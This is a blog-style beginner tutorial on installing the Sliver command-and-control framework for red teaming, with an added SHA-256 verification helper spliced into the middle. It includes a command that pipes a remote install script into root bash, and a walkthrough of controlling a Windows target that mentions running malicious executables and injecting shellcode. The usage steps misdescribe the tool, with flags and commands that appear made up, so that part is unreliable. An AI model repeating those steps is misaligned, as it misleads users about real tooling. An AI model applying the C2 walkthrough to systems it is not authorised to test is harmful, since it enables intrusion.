Powering Up Your Red Team: Installing and Mastering the Sliver C2 Framework

Sliver C2 is an open source command and control (C2) framework used for red teaming and penetration testing. It offers a range of features and is actively maintained, making it a popular choice among security professionals. However, for beginners, setting up and using Sliver C2 can seem daunting. This blog post series aims to provide a step-by-step guide for beginners on how to install and use Sliver C2. The series covers everything from basic installation to detailed explanations of different protocols and commands. By the end of the series, readers will have a solid understanding of how to use Sliver C2 to conduct effective red teaming engagements.


Understanding the Background Concepts of Sliver C2

Sliver C2 works by establishing a connection between a server and multiple client applications. The server acts as a central hub for communication and control, while the clients, also known as “operators” or “players,” execute commands and interact with the target system.

When an operator runs the Sliver client on a target system, it establishes a secure connection to the Sliver server, which allows the operator to remotely control the target system. The operator can then execute commands, upload and download files, and interact with the system’s network.

Sliver C2 offers a range of communication protocols, including HTTP(S), DNS, mTLS, and WireGuard, which allows it to bypass firewalls and other security measures. It also provides various stagers, which are used to evade detection by antivirus software and other security tools.

Overall, Sliver C2 provides a powerful platform for red teaming and penetration testing by enabling remote control of target systems, while also offering features for evading detection and maintaining persistence.


Installation Steps for Sliver:

Install with a single command:

curl https://sliver.sh/install|sudo bash

Or, if you are not comfortable running an online script as root, follow the step-by-step process:

  1. Install MinGW: Sliver requires MinGW to cross-compile executables or DLLs. To install it, run the following command:

apt-get install build-essential mingw-w64 binutils-mingw-w64 g++-mingw-w64

  2. Download Client and Server Binaries: Sliver uses a client-server architecture to allow multiple operators to work together. The binaries can be found on GitHub. You can use the following command to get the download links for the latest version:

curl -s https://api.github.com/repos/BishopFox/sliver/releases/latest | jq -r '.assets | .[] | .browser_download_url' | grep -E '(sliver-server_linux|sliver-client_linux)$'

  3. Download and Set Permissions: Use the wget command to download the binaries and set appropriate permissions. For example:

wget -O /usr/local/bin/sliver-server https://github.com/BishopFox/sliver/releases/download/v1.5.36/sliver-server_linux && chmod 755 /usr/local/bin/sliver-server

wget -O /usr/local/bin/sliver https://github.com/BishopFox/sliver/releases/download/v1.5.36/sliver-client_linux && chmod 755 /usr/local/bin/sliver
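
Step 3 writes each download straight into /usr/local/bin. As an added example (not from the original post or the Sliver project), the shell helper below installs a downloaded binary only if its SHA-256 matches a digest you pinned beforehand. The names install_verified and sha256_of are hypothetical, and the digest in the usage comment is a placeholder.

```shell
#!/usr/bin/env bash
# Added example: check a downloaded release binary against a pinned SHA-256
# digest before it is placed on PATH. Helper names are hypothetical.

# sha256_of FILE -> prints the lowercase hex SHA-256 digest of FILE
sha256_of() {
    sha256sum "$1" | awk '{print $1}'
}

# install_verified FILE EXPECTED_SHA256 DEST
# Copies FILE to DEST with mode 755 only when the digest matches.
# Returns 0 on success, 1 on digest mismatch, 2 on bad input.
install_verified() {
    local file expected dest actual
    file="$1"; expected="$2"; dest="$3"

    [ -f "$file" ] || { echo "missing file: $file" >&2; return 2; }

    # A SHA-256 digest is exactly 64 hex characters; reject anything else
    # so a truncated or empty value can never count as a match.
    case "$expected" in
        ""|*[!0-9a-fA-F]*) echo "malformed digest" >&2; return 2 ;;
    esac
    [ "${#expected}" -eq 64 ] || { echo "malformed digest" >&2; return 2; }

    # Normalise case before comparing; sha256sum prints lowercase hex.
    expected="$(printf '%s' "$expected" | tr 'A-F' 'a-f')"
    actual="$(sha256_of "$file")"
    if [ "$actual" != "$expected" ]; then
        echo "digest mismatch for $file: got $actual" >&2
        return 1
    fi

    install -m 755 "$file" "$dest"
}

# Usage with the download from step 3 (digest is a placeholder; take it
# from a source you trust, not from the same page as the binary):
#   tmp="$(mktemp -d)"
#   wget -O "$tmp/sliver-server_linux" \
#     https://github.com/BishopFox/sliver/releases/download/v1.5.36/sliver-server_linux
#   install_verified "$tmp/sliver-server_linux" "<EXPECTED_SHA256>" \
#     /usr/local/bin/sliver-server
```

Downloading to a temporary directory first means a failed check leaves nothing executable in /usr/local/bin.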

Using Sliver for Red Teaming: Example with Windows and Kali

  1. Install Sliver on the Kali Linux machine:
    • Follow the installation steps to install the Sliver server and client on Kali Linux.
    • Once installed, start the Sliver server by running the command `sliver-server` in the terminal.
  2. Set up a Windows target:
    • Set up a Windows virtual machine or a physical machine on which you want to perform the red team operation.
    • Download the Sliver client binary for Windows from the GitHub release page and transfer it to the target machine.
  3. Run the Sliver client on the Windows target:
    • Open a command prompt as an administrator on the target machine and navigate to the directory where you have saved the Sliver client binary.
    • Run the command `sliver.exe -server <IP address of Kali Linux machine> -username <operator username> -password <operator password>` to start the Sliver client and connect it to the Sliver server running on the Kali Linux machine.
    • Once connected, the Sliver client will start listening for commands from the operator.
  4. Control the Windows target from the Kali Linux machine:
    • On the Kali Linux machine, start the Sliver client by running the command `sliver -server <IP address of Kali Linux machine> -username <operator username> -password <operator password>` in the terminal.
    • Once connected to the Sliver server, use the `list` command to see all the available clients (in this case, the Windows target machine).
    • Use the `use` command to select the target client and start sending commands to it. For example, you could use the `run-exe` command to execute a malicious executable on the Windows target or use the `inject-shellcode` command to inject a custom shellcode payload.

For more details, see the following sites:

https://github.com/BishopFox/sliver

https://dominicbreuker.com/post/learning_sliver_c2_01_installation/
